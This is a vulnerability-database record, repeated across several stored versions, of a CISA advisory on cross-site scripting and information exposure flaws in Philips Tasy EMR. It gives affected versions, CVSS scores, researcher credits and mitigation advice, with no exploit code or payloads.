"hash": "1c510749e07b75c78babc04b4635d262", "type": "ics", "bulletinFamily": "info", "title": "Philips Tasy EMR (Update A)", "description": "## 1\\. EXECUTIVE SUMMARY\n\n**\\--------- Begin Update A Part 1 of 7 ---------**\n\n * **CVSS v3 4.3**\n * **ATTENTION:** Low skill level to exploit\n\n**\\--------- End Update A Part 1 of 7 ---------**\n\n * **Vendor:** Philips\n * **Equipment: **Tasy EMR\n\n**\\--------- Begin Update A Part 2 of 7 ---------**\n\n * **Vulnerability:** Cross-site Scripting, Information Exposure\n\n**\\--------- End Update A Part 2 of 7 ---------**\n\n## 2\\. UPDATE INFORMATION\n\nThis updated advisory is a follow-up to the original advisory titled ICSMA-19-120-01 Philips Tasy EMR that was published April 30, 2019, on the ICS webpage on us-cert.gov.\n\n## 3\\. RISK EVALUATION\n\n**\\--------- Begin Update A Part 3 of 7 ---------**\n\nSuccessful exploitation of these vulnerabilities could impact or compromise patient confidentiality and system integrity. Philips\u2019 analysis has shown these issues, if fully exploited, may allow an attacker of low skill to provide unexpected input into the application, execute arbitrary code, alter the intended control flow of the system, and access sensitive information.\n\n**\\--------- End Update A Part 3 of 7 ---------**\n\n## 4\\. TECHNICAL DETAILS\n\n### 4.1 AFFECTED PRODUCTS\n\nThe following versions of Tasy EMR, a clinical and administrative workflow-based information system, are affected:\n\n**\\--------- Begin Update A Part 4 of 7 ---------**\n\n * Tasy EMR Versions 3.02.1744 and prior\n * Tasy WebPortal Versions 3.02.1757 and prior\n\n**\\--------- End Update A Part 4 of 7 ---------**\n\n### 4.2 VULNERABILITY OVERVIEW\n\n### 4.2.1 [IMPROPER NEUTRALIZATION OF INPUT DURING WEB PAGE GENERATION ('CROSS-SITE SCRIPTING') CWE-79](<https://cwe.mitre.org/data/definitions/79.html>)\n\nThe software incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.\n\n[CVE-2019-6562](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-6562>) has been assigned to this vulnerability. A CVSS v3 base score of 4.1 has been calculated; the CVSS vector string is ([AV:A/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:A/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N>)).\n\n**\\--------- Begin Update A Part 5 of 7 ---------**\n\n#### 4.2.2 [INFORMATION EXPOSURE CWE-200](<https://cwe.mitre.org/data/definitions/200.html>)\n\nThere is an information exposure vulnerability which may allow a remote attacker to access system and configuration information.\n\n[CVE-2019-13557](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-13557>) has been assigned to this vulnerability. A CVSS v3 base score of 4.3 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N>)).\n\n**\\--------- End Update A Part 5 of 7 ---------**\n\n### 4.3 BACKGROUND\n\n * **CRITICAL INFRASTRUCTURE SECTORS:** Healthcare and Public Health\n * **COUNTRIES/AREAS DEPLOYED:** Brazil, Mexico\n * **COMPANY HEADQUARTERS LOCATION:** Netherlands\n\n### 4.4 RESEARCHER\n\n**\\--------- Begin Update A Part 6 of 7 ---------**\n\nSecurity researcher Rafael Honorato reported and Unimed de Blumenau Cooperativa de Trabalho M\u00e9dico IT Department each separately reported a vulnerability to Philips.\n\n**\\--------- End Update A Part 6 of 7 ---------**\n\n## 5\\. MITIGATIONS\n\n**\\--------- Begin Update A Part 7 of 7 ---------**\n\nPhilips advises users to update to the most recently released versions of the product, following the Tasy EMR release schedule. Update Tasy EMR, to version 3.03.1745 or higher and update Tasy WebPortal, to version 3.03.1758 or higher.\n\nPhilips also recommends users follow the instructions in the product configuration manual and follow market standard best practices from the application server manufacturer documentation related to security.\n\n**\\--------- End Update A Part 7 of 7 ---------**\n\nUsers should upgrade Service Packs as soon as possible. Hosted solutions will be patched automatically. Users running the application on premise are always alerted via release notes on changes to the system.\n\nCISA recommends users take defensive measures to minimize the risk of exploitation of these vulnerabilities. Specifically, users should:\n\n * Restrict system access to authorized personnel only and follow a least privilege approach.\n * Apply defense-in-depth strategies.\n * Disable unnecessary accounts and services.\n * Where additional information is needed, refer to existing cybersecurity in medical device guidance issued by the FDA that can be found at the following location:\n\n<https://www.fda.gov/MedicalDevices/DigitalHealth/ucm373213.htm>\n\nCISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. \n \nCISA also provides a section for [control systems security recommended practices](<https://www.us-cert.gov/ics/recommended-practices>) on the ICS webpage on [us-cert.gov](<https://www.us-cert.gov/ics>). Several recommended practices are available for reading and download, including [Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies](<https://www.us-cert.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf>).\n\nAdditional mitigation guidance and recommended practices are publicly available on the [ICS webpage on us-cert.gov](<https://www.us-cert.gov/ics>) in the Technical Information Paper, [ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies](<https://www.us-cert.gov/ics/tips/ICS-TIP-12-146-01B>). \n \nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to CISA for tracking and correlation against other incidents.\n\nNo known public exploits specifically target these vulnerabilities.\n\n## \nContact Information\n\nFor any questions related to this report, please contact the CISA at: \n \nEmail: [CISAservicedesk@cisa.dhs.gov](<mailto:cisaservicedesk@cisa.dhs.gov>) \nToll Free: 1-888-282-0870\n\nFor industrial control systems cybersecurity information: https://us-cert.cisa.gov/ics \nor incident reporting: https://us-cert.cisa.gov/report\n\nCISA continuously strives to improve its products and services. You can help by choosing one of the links below to provide feedback about this product.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ics/advisories/ICSMA-19-120-01>); we'd welcome your feedback.\n", "published": "2019-11-07T00:00:00", "modified": "2019-11-07T00:00:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.0"}, "exploitabilityScore": 2.3, "impactScore": 2.7}, "href": "https://www.us-cert.gov/ics/advisories/ICSMA-19-120-01", "reporter": "Industrial Control Systems Cyber Emergency Response Team", "references": ["https://cwe.mitre.org/data/definitions/79.html", "https://www.dhs.gov/homeland-security-no-fear-act-reporting", "https://www.dhs.gov/plug-information", "https://www.dhs.gov/privacy-policy", "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "https://www.us-cert.gov/ics/recommended-practices", "https://www.whitehouse.gov/", "https://www.dhs.gov/plain-writing-dhs", "https://www.oig.dhs.gov/", "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:A/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N", "https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ics/advisories/ICSMA-19-120-01", "https://www.dhs.gov/freedom-information-act-foia", "http://twitter.com/icscert", "https://www.us-cert.gov/ics/tips/ICS-TIP-12-146-01B", "https://www.us-cert.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf", "https://www.dhs.gov", "https://www.fda.gov/MedicalDevices/DigitalHealth/ucm373213.htm", "http://www.addthis.com/bookmark.php?url=https%3A%2F%2Fus-cert.cisa.gov%2Fics%2Fadvisories%2FICSMA-19-120-01", "https://cwe.mitre.org/data/definitions/200.html", "https://www.usa.gov/", "https://www.dhs.gov/", "https://www.facebook.com/sharer.php?u=https%3A%2F%2Fus-cert.cisa.gov%2Fics%2Fadvisories%2FICSMA-19-120-01", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-6562", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-13557", "https://twitter.com/share?url=https%3A%2F%2Fus-cert.cisa.gov%2Fics%2Fadvisories%2FICSMA-19-120-01", "https://www.us-cert.gov/ics", "https://www.us-cert.gov/ics"], "cvelist": ["CVE-2019-6562", "CVE-2019-13557"], "immutableFields": [], "lastseen": "2021-07-28T18:28:57", "history": [{"bulletin": {"id": "ICSMA-19-120-01", "hash": "6781a0fb55ca34e70d4877b86a4fb9ce22eb7d03acfdc0cca92443b0793809e5", "type": "ics", "bulletinFamily": "info", "title": "Philips Tasy EMR (Update A)", "description": "## 1\\. EXECUTIVE SUMMARY\n\n**\\--------- Begin Update A Part 1 of 7 ---------**\n\n * **CVSS v3 4.3**\n * **ATTENTION:** Low skill level to exploit\n\n**\\--------- End Update A Part 1 of 7 ---------**\n\n * **Vendor:** Philips\n * **Equipment: **Tasy EMR\n\n**\\--------- Begin Update A Part 2 of 7 ---------**\n\n * **Vulnerability:** Cross-site Scripting, Information Exposure\n\n**\\--------- End Update A Part 2 of 7 ---------**\n\n## 2\\. UPDATE INFORMATION\n\nThis updated advisory is a follow-up to the original advisory titled ICSMA-19-120-01 Philips Tasy EMR that was published April 30, 2019, on the ICS webpage on us-cert.gov.\n\n## 3\\. RISK EVALUATION\n\n**\\--------- Begin Update A Part 3 of 7 ---------**\n\nSuccessful exploitation of these vulnerabilities could impact or compromise patient confidentiality and system integrity. Philips\u2019 analysis has shown these issues, if fully exploited, may allow an attacker of low skill to provide unexpected input into the application, execute arbitrary code, alter the intended control flow of the system, and access sensitive information.\n\n**\\--------- End Update A Part 3 of 7 ---------**\n\n## 4\\. TECHNICAL DETAILS\n\n### 4.1 AFFECTED PRODUCTS\n\nThe following versions of Tasy EMR, a clinical and administrative workflow-based information system, are affected:\n\n**\\--------- Begin Update A Part 4 of 7 ---------**\n\n * Tasy EMR Versions 3.02.1744 and prior\n * Tasy WebPortal Versions 3.02.1757 and prior\n\n**\\--------- End Update A Part 4 of 7 ---------**\n\n### 4.2 VULNERABILITY OVERVIEW\n\n### 4.2.1 [IMPROPER NEUTRALIZATION OF INPUT DURING WEB PAGE GENERATION ('CROSS-SITE SCRIPTING') CWE-79](<https://cwe.mitre.org/data/definitions/79.html>)\n\nThe software incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.\n\n[CVE-2019-6562](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-6562>) has been assigned to this vulnerability. A CVSS v3 base score of 4.1 has been calculated; the CVSS vector string is ([AV:A/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:A/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N>)).\n\n**\\--------- Begin Update A Part 5 of 7 ---------**\n\n#### 4.2.2 [INFORMATION EXPOSURE CWE-200](<https://cwe.mitre.org/data/definitions/200.html>)\n\nThere is an information exposure vulnerability which may allow a remote attacker to access system and configuration information.\n\n[CVE-2019-13557](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-13557>) has been assigned to this vulnerability. A CVSS v3 base score of 4.3 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N>)).\n\n**\\--------- End Update A Part 5 of 7 ---------**\n\n### 4.3 BACKGROUND\n\n * **CRITICAL INFRASTRUCTURE SECTORS:** Healthcare and Public Health\n * **COUNTRIES/AREAS DEPLOYED:** Brazil, Mexico\n * **COMPANY HEADQUARTERS LOCATION:** Netherlands\n\n### 4.4 RESEARCHER\n\n**\\--------- Begin Update A Part 6 of 7 ---------**\n\nSecurity researcher Rafael Honorato reported and Unimed de Blumenau Cooperativa de Trabalho M\u00e9dico IT Department each separately reported a vulnerability to Philips.\n\n**\\--------- End Update A Part 6 of 7 ---------**\n\n## 5\\. MITIGATIONS\n\n**\\--------- Begin Update A Part 7 of 7 ---------**\n\nPhilips advises users to update to the most recently released versions of the product, following the Tasy EMR release schedule. Update Tasy EMR, to version 3.03.1745 or higher and update Tasy WebPortal, to version 3.03.1758 or higher.\n\nPhilips also recommends users follow the instructions in the product configuration manual and follow market standard best practices from the application server manufacturer documentation related to security.\n\n**\\--------- End Update A Part 7 of 7 ---------**\n\nUsers should upgrade Service Packs as soon as possible. Hosted solutions will be patched automatically. Users running the application on premise are always alerted via release notes on changes to the system.\n\nCISA recommends users take defensive measures to minimize the risk of exploitation of these vulnerabilities. Specifically, users should:\n\n * Restrict system access to authorized personnel only and follow a least privilege approach.\n * Apply defense-in-depth strategies.\n * Disable unnecessary accounts and services.\n * Where additional information is needed, refer to existing cybersecurity in medical device guidance issued by the FDA that can be found at the following location:\n\n<https://www.fda.gov/MedicalDevices/DigitalHealth/ucm373213.htm>\n\nCISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. \n \nCISA also provides a section for [control systems security recommended practices](<https://www.us-cert.gov/ics/recommended-practices>) on the ICS webpage on [us-cert.gov](<https://www.us-cert.gov/ics>). Several recommended practices are available for reading and download, including [Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies](<https://www.us-cert.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf>).\n\nAdditional mitigation guidance and recommended practices are publicly available on the [ICS webpage on us-cert.gov](<https://www.us-cert.gov/ics>) in the Technical Information Paper, [ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies](<https://www.us-cert.gov/ics/tips/ICS-TIP-12-146-01B>). \n \nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to CISA for tracking and correlation against other incidents.\n\nNo known public exploits specifically target these vulnerabilities.\n\n## \nContact Information\n\nFor any questions related to this report, please contact the CISA at: \n \nEmail: [CISAservicedesk@cisa.dhs.gov](<mailto:cisaservicedesk@cisa.dhs.gov>) \nToll Free: 1-888-282-0870\n\nFor industrial control systems cybersecurity information: https://www.us-cert.gov/ics \nor incident reporting: https://www.us-cert.gov/report\n\nCISA continuously strives to improve its products and services. You can help by choosing one of the links below to provide feedback about this product.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\nWas this document helpful? Yes | Somewhat | No\n", "published": "2019-11-07T00:00:00", "modified": "2019-11-07T00:00:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {}, "cvss3": {}, "href": "https://www.us-cert.gov//ics/advisories/ICSMA-19-120-01", "reporter": "Industrial Control Systems Cyber Emergency Response Team", "references": ["https://cwe.mitre.org/data/definitions/79.html", "https://www.dhs.gov/homeland-security-no-fear-act-reporting", "https://www.dhs.gov/plug-information", "https://www.dhs.gov/privacy-policy", "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "https://www.us-cert.gov/ics/recommended-practices", "https://www.whitehouse.gov/", "https://www.dhs.gov/plain-writing-dhs", "https://www.oig.dhs.gov/", "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:A/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N", "https://www.dhs.gov/freedom-information-act-foia", "http://twitter.com/icscert", "https://www.us-cert.gov/ics/tips/ICS-TIP-12-146-01B", "https://www.us-cert.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf", "https://www.dhs.gov", "https://www.fda.gov/MedicalDevices/DigitalHealth/ucm373213.htm", "http://www.addthis.com/bookmark.php?url=https%3A%2F%2Fus-cert.cisa.gov%2Fics%2Fadvisories%2FICSMA-19-120-01", "https://cwe.mitre.org/data/definitions/200.html", "/forms/feedback?helpful=no&document=ICSMA-19-120-01: Philips Tasy EMR (Update A)&trackingNumber=&url=https://us-cert.cisa.gov/ics/advisories/ICSMA-19-120-01&site_name=US-CERT", "https://www.usa.gov/", "https://www.dhs.gov/", "/forms/feedback?helpful=somewhat&document=ICSMA-19-120-01: Philips Tasy EMR (Update A)&trackingNumber=&url=https://us-cert.cisa.gov/ics/advisories/ICSMA-19-120-01&site_name=US-CERT", "https://www.facebook.com/sharer.php?u=https%3A%2F%2Fus-cert.cisa.gov%2Fics%2Fadvisories%2FICSMA-19-120-01", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-6562", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-13557", "https://twitter.com/share?url=https%3A%2F%2Fus-cert.cisa.gov%2Fics%2Fadvisories%2FICSMA-19-120-01", "https://www.us-cert.gov/ics", "https://www.us-cert.gov/ics", "/forms/feedback?helpful=yes&document=ICSMA-19-120-01: Philips Tasy EMR (Update A)&trackingNumber=&url=https://us-cert.cisa.gov/ics/advisories/ICSMA-19-120-01&site_name=US-CERT"], "cvelist": ["CVE-2019-6562", "CVE-2019-13557"], "immutableFields": [], "lastseen": "2020-07-07T17:26:31", "history": [], "viewCount": 55, "enchantments": {"dependencies": {"modified": "2020-07-07T17:26:31", "references": [{"idList": ["CVE-2019-6562", "CVE-2019-13557"], "type": "cve"}, {"idList": ["SMNTC-108120", "SMNTC-110814"], "type": "symantec"}, {"idList": ["ICSMA-20-184-01", "ICSA-20-063-04", "ICSA-15-293-03", "ICSMA-19-190-01", "ICSA-11-110-01", "ICSMA-17-250-02A", "ICSA-14-254-01", "ICSA-18-100-02", "ICSA-18-004-02A", "ICSA-16-259-01", "ICSA-20-044-01", "ICSA-17-115-04", "ICSA-11-243-03A", "ICSA-20-205-01", "ICSA-15-071-01", "ICSA-15-057-01", "ICSA-16-126-01", "ICSA-15-013-02", "ICSA-20-133-02", "ICSMA-18-179-01", "ICSMA-17-292-01", "ICSA-20-154-02", "ICSA-19-344-06", "ICSA-18-290-01", "ICSA-19-043-06", "ICSA-19-050-04", "ICSA-20-042-05", "ICSA-17-304-01", "ICSA-19-297-02", "ICSA-18-046-04", "ICSA-20-154-03", "ICSA-20-051-01", "ICSA-12-150-01", "ICSA-14-189-01", "ICSA-13-329-01", "ICSA-20-042-13", "ICSA-17-215-01", "ICSA-18-296-01", "ICSMA-19-255-01", "ICSA-18-347-03", "ICSA-17-045-01", "ICSA-12-102-05", "ICSA-17-129-02", "ICSA-19-094-01", "ICSMA-20-049-02", "ICSA-20-014-02", "ICSA-20-091-01", "ICSA-20-128-01", "ICSA-20-105-04", "ICSA-20-079-01", "ICSA-16-161-01", "ICSA-13-053-02A", "ICSA-16-196-03", "ICSA-12-320-01", "ICSA-19-213-04", "ICSA-14-189-02", "ICSA-20-189-01", "ICSA-17-103-01", "ICSA-16-033-01", "ICSA-17-187-02", "ICSA-17-285-02", "ICSA-10-301-01A", "ICSA-15-309-02", "ICSA-14-105-03B", "ICSA-17-241-01", "ICSA-18-254-02", "ICSA-15-202-03B", "ICSA2012601", "ICSA-14-114-02", "ICSA-17-290-01", "ICSA-18-284-03", "ICSA-17-017-01", "ICSA2012602", "ICSA-13-045-01", "ICSA-19-038-02", "ICSA-19-029-01", "ICSA-16-070-02", "ICSA-17-138-03", "ICSA-12-212-01", "ICSA-15-008-01A", "ICSA-12-012-01A", "ICSA-16-021-01", "ICSA-20-042-09", "ICSA-17-243-02", "ICSA-17-136-03", "ICSA-313-01", "ICSA-19-164-01", "ICSA-15-076-02", "ICSA-18-270-01", "ICSA-20-063-01", "ICSA-14-128-01", "ICSA-14-269-01A", "ICSA-13-213-01", "ICSA-15-300-03A", "ICSA-11-119-01", "ICSA-18-275-01", "ICSA-14-105-02A", "ICSA-15-120-01", "ICSA-19-050-01", "ICSA-14-269-02"], "type": "ics"}], "rev": 2}, "score": {"modified": "2020-07-07T17:26:31", "rev": 2, "value": 6.2, "vector": "NONE"}}, "objectVersion": "1.4"}, "lastseen": "2020-07-07T17:26:31", "differentElements": ["description", "references"], "edition": 1}, {"bulletin": {"id": "ICSMA-19-120-01", "hash": "bec1cf9954e795552db6c376958ced6fdda4787db076500e50a58c0b54a25cdb", "type": "ics", "bulletinFamily": "info", "title": "Philips Tasy EMR (Update A)", "description": "## 1\\. EXECUTIVE SUMMARY\n\n**\\--------- Begin Update A Part 1 of 7 ---------**\n\n * **CVSS v3 4.3**\n * **ATTENTION:** Low skill level to exploit\n\n**\\--------- End Update A Part 1 of 7 ---------**\n\n * **Vendor:** Philips\n * **Equipment: **Tasy EMR\n\n**\\--------- Begin Update A Part 2 of 7 ---------**\n\n * **Vulnerability:** Cross-site Scripting, Information Exposure\n\n**\\--------- End Update A Part 2 of 7 ---------**\n\n## 2\\. UPDATE INFORMATION\n\nThis updated advisory is a follow-up to the original advisory titled ICSMA-19-120-01 Philips Tasy EMR that was published April 30, 2019, on the ICS webpage on us-cert.gov.\n\n## 3\\. RISK EVALUATION\n\n**\\--------- Begin Update A Part 3 of 7 ---------**\n\nSuccessful exploitation of these vulnerabilities could impact or compromise patient confidentiality and system integrity. Philips\u2019 analysis has shown these issues, if fully exploited, may allow an attacker of low skill to provide unexpected input into the application, execute arbitrary code, alter the intended control flow of the system, and access sensitive information.\n\n**\\--------- End Update A Part 3 of 7 ---------**\n\n## 4\\. TECHNICAL DETAILS\n\n### 4.1 AFFECTED PRODUCTS\n\nThe following versions of Tasy EMR, a clinical and administrative workflow-based information system, are affected:\n\n**\\--------- Begin Update A Part 4 of 7 ---------**\n\n * Tasy EMR Versions 3.02.1744 and prior\n * Tasy WebPortal Versions 3.02.1757 and prior\n\n**\\--------- End Update A Part 4 of 7 ---------**\n\n### 4.2 VULNERABILITY OVERVIEW\n\n### 4.2.1 [IMPROPER NEUTRALIZATION OF INPUT DURING WEB PAGE GENERATION ('CROSS-SITE SCRIPTING') CWE-79](<https://cwe.mitre.org/data/definitions/79.html>)\n\nThe software incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.\n\n[CVE-2019-6562](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-6562>) has been assigned to this vulnerability. A CVSS v3 base score of 4.1 has been calculated; the CVSS vector string is ([AV:A/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:A/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N>)).\n\n**\\--------- Begin Update A Part 5 of 7 ---------**\n\n#### 4.2.2 [INFORMATION EXPOSURE CWE-200](<https://cwe.mitre.org/data/definitions/200.html>)\n\nThere is an information exposure vulnerability which may allow a remote attacker to access system and configuration information.\n\n[CVE-2019-13557](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-13557>) has been assigned to this vulnerability. A CVSS v3 base score of 4.3 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N>)).\n\n**\\--------- End Update A Part 5 of 7 ---------**\n\n### 4.3 BACKGROUND\n\n * **CRITICAL INFRASTRUCTURE SECTORS:** Healthcare and Public Health\n * **COUNTRIES/AREAS DEPLOYED:** Brazil, Mexico\n * **COMPANY HEADQUARTERS LOCATION:** Netherlands\n\n### 4.4 RESEARCHER\n\n**\\--------- Begin Update A Part 6 of 7 ---------**\n\nSecurity researcher Rafael Honorato reported and Unimed de Blumenau Cooperativa de Trabalho M\u00e9dico IT Department each separately reported a vulnerability to Philips.\n\n**\\--------- End Update A Part 6 of 7 ---------**\n\n## 5\\. MITIGATIONS\n\n**\\--------- Begin Update A Part 7 of 7 ---------**\n\nPhilips advises users to update to the most recently released versions of the product, following the Tasy EMR release schedule. Update Tasy EMR, to version 3.03.1745 or higher and update Tasy WebPortal, to version 3.03.1758 or higher.\n\nPhilips also recommends users follow the instructions in the product configuration manual and follow market standard best practices from the application server manufacturer documentation related to security.\n\n**\\--------- End Update A Part 7 of 7 ---------**\n\nUsers should upgrade Service Packs as soon as possible. Hosted solutions will be patched automatically. Users running the application on premise are always alerted via release notes on changes to the system.\n\nCISA recommends users take defensive measures to minimize the risk of exploitation of these vulnerabilities. Specifically, users should:\n\n * Restrict system access to authorized personnel only and follow a least privilege approach.\n * Apply defense-in-depth strategies.\n * Disable unnecessary accounts and services.\n * Where additional information is needed, refer to existing cybersecurity in medical device guidance issued by the FDA that can be found at the following location:\n\n<https://www.fda.gov/MedicalDevices/DigitalHealth/ucm373213.htm>\n\nCISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. \n \nCISA also provides a section for [control systems security recommended practices](<https://www.us-cert.gov/ics/recommended-practices>) on the ICS webpage on [us-cert.gov](<https://www.us-cert.gov/ics>). Several recommended practices are available for reading and download, including [Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies](<https://www.us-cert.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf>).\n\nAdditional mitigation guidance and recommended practices are publicly available on the [ICS webpage on us-cert.gov](<https://www.us-cert.gov/ics>) in the Technical Information Paper, [ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies](<https://www.us-cert.gov/ics/tips/ICS-TIP-12-146-01B>). \n \nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to CISA for tracking and correlation against other incidents.\n\nNo known public exploits specifically target these vulnerabilities.\n\n## \nContact Information\n\nFor any questions related to this report, please contact the CISA at: \n \nEmail: [CISAservicedesk@cisa.dhs.gov](<mailto:cisaservicedesk@cisa.dhs.gov>) \nToll Free: 1-888-282-0870\n\nFor industrial control systems cybersecurity information: https://us-cert.cisa.gov/ics \nor incident reporting: https://us-cert.cisa.gov/report\n\nCISA continuously strives to improve its products and services. You can help by choosing one of the links below to provide feedback about this product.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://surveymonkey.com/r/G8STDRY?product=https://us-cert.cisa.gov/ics/advisories/ICSMA-19-120-01>); we'd welcome your feedback.\n", "published": "2019-11-07T00:00:00", "modified": "2019-11-07T00:00:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {}, "cvss3": {}, "href": "https://www.us-cert.gov//ics/advisories/ICSMA-19-120-01", "reporter": "Industrial Control Systems Cyber Emergency Response Team", "references": ["https://cwe.mitre.org/data/definitions/79.html", "https://www.dhs.gov/homeland-security-no-fear-act-reporting", "https://www.dhs.gov/plug-information", "https://www.dhs.gov/privacy-policy", "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "https://www.us-cert.gov/ics/recommended-practices", "https://www.whitehouse.gov/", "https://www.dhs.gov/plain-writing-dhs", "https://www.oig.dhs.gov/", "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:A/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N", "https://www.dhs.gov/freedom-information-act-foia", "http://twitter.com/icscert", "https://www.us-cert.gov/ics/tips/ICS-TIP-12-146-01B", "https://www.us-cert.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf", "https://www.dhs.gov", "https://www.fda.gov/MedicalDevices/DigitalHealth/ucm373213.htm", "http://www.addthis.com/bookmark.php?url=https%3A%2F%2Fus-cert.cisa.gov%2Fics%2Fadvisories%2FICSMA-19-120-01", "https://cwe.mitre.org/data/definitions/200.html", "https://www.usa.gov/", "https://www.dhs.gov/", "https://www.facebook.com/sharer.php?u=https%3A%2F%2Fus-cert.cisa.gov%2Fics%2Fadvisories%2FICSMA-19-120-01", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-6562", "https://surveymonkey.com/r/G8STDRY?product=https://us-cert.cisa.gov/ics/advisories/ICSMA-19-120-01", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-13557", "https://twitter.com/share?url=https%3A%2F%2Fus-cert.cisa.gov%2Fics%2Fadvisories%2FICSMA-19-120-01", "https://www.us-cert.gov/ics", "https://www.us-cert.gov/ics"], "cvelist": ["CVE-2019-6562", "CVE-2019-13557"], "immutableFields": [], "lastseen": "2020-12-18T03:21:38", "history": [], "viewCount": 55, "enchantments": {"dependencies": {"modified": "2020-12-18T03:21:38", "references": [{"idList": ["CVE-2019-6562", "CVE-2019-13557"], "type": "cve"}, {"idList": ["SMNTC-108120", "SMNTC-110814"], "type": "symantec"}, {"idList": ["ICSA-19-295-01", "ICSMA-19-190-01", "ICSMA-17-250-02A", "ICSA-15-239-02", "ICSA-18-261-01", "ICSA-14-121-01", 